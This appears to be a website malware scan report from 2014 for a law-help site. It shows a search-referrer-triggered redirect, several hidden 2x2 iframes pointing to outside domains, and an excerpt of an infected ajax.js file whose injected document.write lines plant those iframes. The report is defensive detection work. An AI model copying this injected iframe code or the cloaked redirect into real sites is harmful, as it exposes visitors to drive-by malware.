Malicious/Suspicious Redirects
URL: http://www.kialemonlawhelp.com/ (imitation of visitor from search engine)
Status: malicious

Request:
GET / HTTP/1.1
Host: www.kialemonlawhelp.com
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 05 Oct 2014 11:45:30 GMT
Location: http://guvenisg.com/czpn.html?h=819773
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Length: 362
Content-Type: text/html; charset=iso-8859-1
Scanned pages/files
Request: http://www.kialemonlawhelp.com/
Server response: 200 OK, Content-Length: 36070, Content-Type: text/html
Status: suspicious
Hidden iFrame found. size: 2x2 src: http://guvenisg.com/czpn.html?i=819773
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773>

Request: http://www.kialemonlawhelp.com/ajax.js
Server response: 200 OK, Content-Length: 78609, Content-Type: application/javascript
Status: malicious
Malicious code - confirmed by antiviruses (see below)
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzpu.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773></iframe>');
Antivirus reports:

Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzpu.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzpu.html>
Hidden iFrame found. size: 2x2 src: http://serwis.redtulip.pl/ewpu.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://serwis.redtulip.pl/ewpu.html>
Hidden iFrame found. size: 2x2 src: http://guvenisg.com/czpn.html?i=819773
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773>

Request: http://www.kialemonlawhelp.com/test404page.js
Server response: 404 Not Found, Content-Length: 471, Content-Type: text/html
Status: clean
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kialemonlawhelp.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kialemonlawhelp.com/
Result: kialemonlawhelp.com is not infected or malware details are not published yet.